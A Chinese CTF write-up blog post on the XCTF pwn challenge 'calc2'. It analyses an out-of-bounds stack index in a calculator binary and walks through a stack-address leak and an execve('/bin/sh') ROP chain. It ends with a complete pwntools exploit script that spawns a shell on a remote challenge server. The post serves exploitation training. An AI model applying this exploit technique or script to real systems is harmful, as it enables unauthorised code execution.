攻防世界PWN之calc2题解

最新推荐文章于 2023-05-06 00:08:28 发布
最新推荐文章于 2023-05-06 00:08:28 发布
阅读量1.1k 收藏
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103517704
版权
pwn 同时被 3 个专栏收录
161 篇文章 26 订阅
订阅专栏
CTF
161 篇文章 11 订阅
订阅专栏
二进制漏洞
161 篇文章 11 订阅
订阅专栏

calc2

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,发现libc被静态编译进了程序中,又由于没有开启PIE,,所以,我们就直接可以获得需要的函数的地址。然而,我们发现,system、execve这些函数都没有,有没有one_gadget,那么我们只能通过系统调用来构造ROP执行/bin/shgetshell

发现,该程序是一个四则运算表达式计算程序

其中,我们需要重点关注的就是a2[v4+1] = v9这句代码,可能造成下标越界。

我们仔细分析程序,然后用C语言还原这个计算过程

  1. #include <stdio.h>  
  2. #include <string.h>  
  3. #include <stdlib.h>  
  4.   
  5. //  
  6. struct Stack {  
  7.     int top;  
  8.     int data[100];  
  9. };  
  10.   
  11.   
  12. void eval(Stack *num_stack,char op) {  
  13.     switch (op) {  
  14.         case '+':  
  15.             num_stack->data[num_stack->top - 1] += num_stack->data[num_stack->top];  
  16.             break;  
  17.         case '-':  
  18.             num_stack->data[num_stack->top - 1] -= num_stack->data[num_stack->top];  
  19.             break;  
  20.         case '*':  
  21.             num_stack->data[num_stack->top - 1] *= num_stack->data[num_stack->top];  
  22.             break;  
  23.         case '/':  
  24.             num_stack->data[num_stack->top - 1] /= num_stack->data[num_stack->top];  
  25.             break;  
  26.     }  
  27.     //出栈一个无用数据  
  28.     num_stack->top--;  
  29. }  
  30.   
  31. int parse_expr(char *in,Stack *num_stack) {  
  32.     //存放运算符的栈  
  33.     Stack op_stack;  
  34.     memset(&op_stack,0,sizeof(Stack));  
  35.     char *p = in;  
  36.     for (int i=0;; ++i) {  
  37.         char ch = in[i];  
  38.         //遇到非数字,判定为运算符  
  39.         if ( unsigned(ch - '0') > 9) {  
  40.             int len = i + in - p;  
  41.             char *tmp = (char *)malloc(len+1);  
  42.             memcpy(tmp,p,len);  
  43.             tmp[len] = '\0';  
  44.             if ( !strcmp(tmp, "0") ) {  
  45.                 puts("prevent division by zero");  
  46.                 fflush(stdout);  
  47.                 return 0;  
  48.             }  
  49.             int x = atoi(tmp);  
  50.             //操作数入栈  
  51.             if (x > 0) {  
  52.                 num_stack->top++;  
  53.                 num_stack->data[num_stack->top] = x;  
  54.             }  
  55.   
  56.             //表达式错误,不能有连续的多个运算符  
  57.             if (ch && in[i+1] - '0' > 9) {  
  58.                 puts("expression error!");  
  59.                 fflush(stdout);  
  60.                 return 0;  
  61.             }  
  62.             p = in + i + 1;  
  63.             //查看栈顶运算符  
  64.             char op =  op_stack.data[op_stack.top];  
  65.             if (op) {  
  66.                 //与当前运算符做比较  
  67.                 switch (ch) {  
  68.                     case '%':  
  69.                     case '*':  
  70.                     case '/':  
  71.                         if ( op != '+' && op != '-' ) {  
  72.                             eval(num_stack, op);  
  73.                             op_stack.data[op_stack.top] = ch;  
  74.                         } else {  
  75.                             op_stack.data[++op_stack.top] = ch;  
  76.                         }  
  77.                         break;  
  78.                     case '+':  
  79.                     case '-':  
  80.                         eval(num_stack, op);  
  81.                         op_stack.data[op_stack.top] = ch;  
  82.                         break;  
  83.                     default:  
  84.                         eval(num_stack, op_stack.data[op_stack.top--]);  
  85.                         break;  
  86.                 }  
  87.             } else {  
  88.                 op_stack.data[op_stack.top] = ch;  
  89.             }  
  90.             if (!ch) {  
  91.                 break;  
  92.             }  
  93.         }  
  94.     }  
  95.     while (op_stack.top >= 0) {  
  96.         eval(num_stack, op_stack.data[op_stack.top--]);  
  97.     }  
  98.     return 1;  
  99. }  
  100.   
  101. int main() {  
  102.     //存放操作数的栈  
  103.     Stack num_stack;  
  104.     num_stack.top = -1;  
  105.     memset(num_stack.data,0,sizeof(int) * 100);  
  106.     char expr[0x400] = {0};  
  107.     while (true) {  
  108.         scanf("%s",expr);  
  109.         if (parse_expr(expr,&num_stack)) {  
  110.             printf("%d\n",num_stack.data[num_stack.top]);  
  111.             fflush(stdout);  
  112.         }  
  113.     }  
  114. }  

再对比IDA,中,我们要是能修改到a2,也就是top指针,那么就能实现任意地址写

再看看这个程序的逻辑,结合我们还原的源代码,能够修改到top的值的关键地方在eval函数

结合源代码,我们看看

如果当num_stack->top0时,就可以造成data数据下标越界,什么时候num_stack->top为0呢?不就是num_stack里只有一个操作数的时候吗。如果,我们输入的表达式为+123,那么,由于该程序判断时的缺陷,表达式的结尾的\0也被当做符号处理,因此,程序先是遇到+号,+号入运算符栈,然后程序遇到123,入num_stack,接下来,程序遇到\0结尾符,于是会调用eval函数,而此时num_stack->top = 0,导致了num_stack->data[-1] += num_stack[num_stack->top],使得num_stack的top变成了123 + 1 = 124,接下来,结尾处又执行了,综上,+123这个表达式使得num_stacktop变成了123。为了便于观察,我们可以加入这样的代码

然后,我们输入+123+456

由此,我们可以用IDA调试,找到calc函数的返回地址的栈位置,便可以修改calc的返回地址,构造ROP。为了构造ROP,我们需要一些gadget,我们可以使用ROPgadgets工具来查找ROPgadget --binary calc2  --only 'pop|ret' | grep 'eax'

  1. #pop eax ; ret  
  2. pop_eax = 0x0805c34b  
  3. #pop ebx ; ret  
  4. pop_ebx = 0x080481d1  
  5. #pop ecx ; pop ebx ; ret  
  6. pop_ecx = 0x080701d1  
  7. #pop edx ; ret  
  8. pop_edx = 0x080701aa  
  9. #int 0x80  
  10. int_80 = 0x08049a21  
  11.   
  12. #通过系统调用来执行/bin/sh  
  13. rop = [pop_eax,0x0b,  
  14.        pop_ecx,0,0,  
  15.        pop_edx,0,  
  16.        int_80,  
  17.        u32('/bin'),  
  18.        u32('/sh\x00')]  

为了得到/bin/sh字符串的地址,我们把/bin/sh到时候存到栈里,然后,我们需要泄露一些栈地址,就能得到/bin/sh字符串地址

我们可以借助输出结果的地方来泄露地址

其中,v1正是num_stack的栈顶指针,v2num_stack的数据区

之前我们知道了,+123,可以使得num_stack的栈顶指针变为123,那么就能泄露偏移123*4字节处的数据,那么要泄露栈地址,我们只需算出main的ebp的偏移,即可泄露

我们看到,当前存放main的ebp的栈地址为0xFFFEA1C8

而v2的地址为0xFFFE9C2C,计算一下(0xFFFEA1C8 - 0xFFFE9C2C) / 4 = 0x167

也就是359,因此,我们只需要输入+360再回车,即可泄露出main函数的ebp,然后,就能计算出/bin/sh字符串在栈里的地址,需要注意的是,泄露出来的数据是负数,因为%d处理的是有符号数,因此,我们只需用0x100000000 + x即可得到原来的数据

  1. sh.recvuntil('\n')  
  2. #泄露mainebp  
  3. sh.sendline('+360')  
  4. #由于泄露出来是一个负数的形式,因此我们将其加上0x100000000即可  
  5. main_ebp = int(sh.recvuntil('\n',drop=True))  
  6. main_ebp = 0x100000000 + main_ebp  
  7. #获得/bin/sh字符串在栈里的位置  
  8. rop[4] = main_ebp - 0x20 + 9 * 4  
  9. print hex(main_ebp)  

现在,我们得到了地址,然后就构造好了ROP链,我们需要依次把ROP链写入到calc的返回地址的栈后面

经过一顿测试,发现,我们不能靠这里来写ROP,因为后续用调用了eval函数,对数据又做了修改吗,因此,我们应该依靠eval函数,因为eval函数里对a1数组做了最后的修改。

eval函数

由于是a1[top-1] += a1[top],因此,本来,我们走360开始就是calc函数的返回地址处,我们向后偏移1,也就是从361开始,这样,不会影响前面的canary值。并且,由于使用的是+=,我们需要先泄露原来a1[top]处的数据,再算出差值,然后提交

  1. #开始写360处就是parse_expr的返回地址,我们写ROP  
  2. for i in range(0,len(rop)):  
  3.    payload = '+' + str(361 + i)  
  4.    sh.sendline(payload)  
  5.    #先泄露原来的值  
  6.    num = int(sh.recvuntil('\n',drop=True))  
  7.    #计算出差值  
  8.    offset = rop[i] - num  
  9.    print hex(rop[i])  
  10.    #如果小于零,我们需要去掉+号,直接使用数字前面的负号  
  11.    if offset<0:  
  12.       payload_ = payload + str(offset)  
  13.    else:  
  14.       payload_ = payload + '+' + str(offset)  
  15.    #发送数据  
  16.    sh.sendline(payload_)  
  17.    #我们还需检验一下是否正确的写入了对的数据  
  18.    value = int(sh.recv(1024))  
  19.    if value < 0:  
  20.       #转为原始数据  
  21.       value += 0x100000000  
  22.    while value!=rop[i]:  
  23.       print "current value is %x" % (value)  
  24.       offset = rop[i] - value  
  25.       if offset<0:  
  26.          sh.sendline(payload + str(offset))  
  27.       else:  
  28.          sh.sendline(payload + '+' + str(offset))  
  29.       value = int(sh.recv(1024))  
  30.       if value < 0:  
  31.          value += 0x100000000  

这样操作以后,ROP写入成功,接下来,我们发送一个非数字和运算符,使得程序退出calc函数,执行ROP链。

  1. #getshell  
  2. sh.sendline('a')  

本题的难点在于找到漏洞,以及分析漏洞,需要一定的时间。

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3.   
  4. #pop eax ; ret  
  5. pop_eax = 0x0805c34b  
  6. #pop ebx ; ret  
  7. pop_ebx = 0x080481d1  
  8. #pop ecx ; pop ebx ; ret  
  9. pop_ecx = 0x080701d1  
  10. #pop edx ; ret  
  11. pop_edx = 0x080701aa  
  12. #int 0x80  
  13. int_80 = 0x08049a21  
  14.   
  15. #通过系统调用来执行/bin/sh  
  16. rop = [pop_eax,0x0b,  
  17.        pop_ecx,0,0,  
  18.        pop_edx,0,  
  19.        int_80,  
  20.        u32('/bin'),  
  21.        u32('/sh\x00')]  
  22.   
  23. #sh = process('./pwnh37')  
  24. sh = remote('111.198.29.45',39005)  
  25. sh.recvuntil('\n')  
  26. #泄露mainebp  
  27. sh.sendline('+360')  
  28. #由于泄露出来是一个负数的形式,因此我们将其加上0x100000000即可  
  29. main_ebp = int(sh.recvuntil('\n',drop=True))  
  30. main_ebp = 0x100000000 + main_ebp  
  31. #获得/bin/sh字符串在栈里的位置  
  32. rop[4] = main_ebp - 0x20 + 9 * 4  
  33. print hex(main_ebp)  
  34.   
  35. #开始写360处就是parse_expr的返回地址,我们写ROP  
  36. for i in range(0,len(rop)):  
  37.    payload = '+' + str(361 + i)  
  38.    sh.sendline(payload)  
  39.    #先泄露原来的值  
  40.    num = int(sh.recvuntil('\n',drop=True))  
  41.    #计算出差值  
  42.    offset = rop[i] - num  
  43.    print hex(rop[i])  
  44.    #如果小于零,我们需要去掉+号,直接使用数字前面的负号  
  45.    if offset<0:  
  46.       payload_ = payload + str(offset)  
  47.    else:  
  48.       payload_ = payload + '+' + str(offset)  
  49.    #发送数据  
  50.    sh.sendline(payload_)  
  51.    #我们还需检验一下是否正确的写入了对的数据  
  52.    value = int(sh.recv(1024))  
  53.    if value < 0:  
  54.       #转为原始数据  
  55.       value += 0x100000000  
  56.    while value!=rop[i]:  
  57.       print "current value is %x" % (value)  
  58.       offset = rop[i] - value  
  59.       if offset<0:  
  60.          sh.sendline(payload + str(offset))  
  61.       else:  
  62.          sh.sendline(payload + '+' + str(offset))  
  63.       value = int(sh.recv(1024))  
  64.       if value < 0:  
  65.          value += 0x100000000  
  66.   
  67. #getshell  
  68. sh.sendline('a')  
  69.   
  70. sh.interactive() 
ha1vk
关注
专栏目录
攻防世界 newbie_calc
qq_42882717的博客
11-26 240
//#include<iostream> #include<stdio.h> //using namespace std; int sub_401100(int a, int b) { return a * b; } int sub_401000(int a, int b) { return a + b; } int sub_401220(int a, int b) { return a - b; } int main() { int v3; // eax int ...
攻防世界pwn RCalc
PLpa的博客
02-22 493
需要知识:ROP,堆溢出 发现查询没开PIE和canary。 程序在最开始申请了几个堆空间,并不允许我们自己申请,而且整个程序并没有free的地方,所以常规的堆漏洞并不容易利用,这时候我们就继续往下看。 这里可以看到,主要功能函数处有一个没有输入限制的字符串,由此我们就联想到使用常规的ROP。 但是程序在主要功能函数中添加了随机数植入,构造了一个自定义的canary,我们只要覆盖了这个随机...
攻防世界 Newbie_calculations
weixin_53349587的博客
03-12 711
程序在运行的时候不能输入值,本来以为是程序故意设置成这样的,分析之后在知道原来是程序正在加载,而且没有获取输入的函数,程序执行完就可以输出flag,但是程序中的while循环太多了,导致程序一直执行不下去,先看一下main函数: 通过观察不难看出,主函数中一共有sub_291000、sub_291100和sub_291220这三个函数 ,而且导致程序执行不下去的代码也在这三个函数中,我们只需分析这三个函数的具体作用,从而简化函数,重新编写main函数即可得到flag。 sub_291000:
[RoarCTF 2019]Easy Calc攻防世界 ics07、[极客大挑战 2019]EasySQL
weixin_52268949的博客
04-22 737
利用点就在上面这串代码中,这里先把文件名拼接到backup目录下,然后正则匹配,这里正则的意思是:匹配最后一个点后面的后缀,然后下面的else里面又更改了当前目录。然后通过POST方式写入con和file,一个为文件内容一个为文件路径,又因为有正则匹配的过滤,我们将文件名取名为5.php/.,又因为这是Linux操作系统所以可以解析那么接下来我们上传文件即可。通过这段代码发现只需要result有值我们就可以上传文件了,一开始我的思路是通过sql注入完成但是失败了,这时候我们看一下sql查询的条件。
攻防世界PWN之RCalc题解
seaaseesa的博客
11-19 1442
RCalc 首先,检查一下程序的保护机制,还不错,只开了NX 然后,我们用IDA分析 看到这,感觉像是堆的题,应该会很复杂。然而,我们再看看其他地方,发现这个函数只是在初始化时调用的,也不太可能会被利用,而且程序全程没有调用free函数 然后,我们瞧瞧其他函数,看到这里感觉好复杂,然而,它只是一个用来生成随机数的函数罢了 然后,我们继续看其他函数 这个样子,好像是can...
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 955
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 569
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1442
学习pwn开始,慢慢来不要急
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 501
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界 pwn-100
10-26 328
1 题目 2 分析 如上图,这道题很简单粗暴,直接暴露溢出点,但是需要注意的是,每次输入读200!这点下面会有坑。 思路:利用ROP泄露出read的地址,利用Libsearch获得system和/bin/sh的地址。这些都是常规流程。但是,有一点要注意,在发送payload的时候,一定不能使用sendline或者sendafterline。因为这两个方法会自动在你的payload后面添加\n。本题严格读取200单元,多出来的\n作为下次读取的开头,会导致第二次发送的错误!exp如下 f
pwnable md5 calculator(随机数生成)
九层台
09-28 514
开启了canary和NX保护 int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax int v5; // [esp+18h] [ebp-8h] int v6; // [esp+1Ch] [ebp-4h] setvbuf(stdout, 0, 1, 0);...
pwnable.kr - md5 calculator
加号减减号的博客
03-07 1912
题目简介 分析 wirteup 参考资料 题目简介 题目给出的信息如下: 可知该题实现了一个 MD5 计算器,并且给出了一个提示,提示稍后再说。做这道题我学到了一个新的技能,就是 python 里面的 os.popen() 的用法,觉得十分有用,希望对大家也有帮助。 分析 下载得到文件,IDA 分析得到 main 函数如下: 这里可以得知几个关键的信息,...
[BUUCTF-pwn] simple_calc_2016
weixin_52640415的博客
12-14 361
先看漏点: 正常情况下,5退出直接return 0或者free再return就行了,这里还有个memcpy,v29是堆指针,v26在栈内。v26的定义是rbp-40h 64位系统写8个qword就到一般rbp后边就是ret而允许写的数是0x100/2个,明显的溢出,只需要写9个然后写rop即可。 char v26[40]; // [rsp+10h] [rbp-40h] BYREF ....... case 1: adds((__int64)"%d", ...
jarvis oj pwn calc.exe writeup
charlie_heng的专栏
02-19 523
这题其实难是难在代码比较多,要审计比较长时间 首先checksec,发现没开NX,估计就是要用shellcode了 然后审计了一波,粗略发现了两个漏洞 1. 没有检查calloc出来那几个堆是否满了,有可能会溢出到下一个堆,但是这里用不了,所以不详细说了 2. 使用var ,可以添加add sub等已经存在的函数,从而实现替代了函数功能的作用 这里用的就是第二个漏洞 var add =...
[BUUCTFpwn] noxctf2018_the_name_calculator
weixin_52640415的博客
12-31 462
printf格式化字符串漏洞 漏洞点: main中读name有溢出,覆盖到v4可以进入下一步 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[28]; // [esp+Ch] [ebp-2Ch] BYREF int v4; // [esp+28h] [ebp-10h] unsigned int v5; // [esp+2Ch] [ebp-Ch] v5 = _
stack canary之pwnbale.kr MD5 calculator
jiuweideqixu的博客
08-26 310
We made a simple MD5 calculator as a network service. Find a bug and exploit it to get a shell. Download : http://pwnable.kr/bin/hash hint : this service shares the same machine with pwnable.kr web service Running at : nc pwnable.kr 9002 程序的执行: ma.
pwnable.tw calc writeup
jmp esp
09-27 1684
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1585
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
boston-key-party-2016-pwn-simple_calc 题解
lifanxin的博客
02-18 529
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该样本来自2016年boston-key-party ctf的一道pwn题–simple_calc 检查样本信息:   只开启了NX保护,64位小端程序 漏洞定位 将样本拖入IDA进行分析时,会发现text段特别多,仔细分析后会发现很多函数都没有被使用,写完wp后,我猛然发现引用这么多看似无用的text段,其实是为了引用更多的gadget,方便后面ROP链的构造。好的,废话不多说,进行漏洞分析。 分析main函数,可以发现该样本是一个菜单题,先要
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值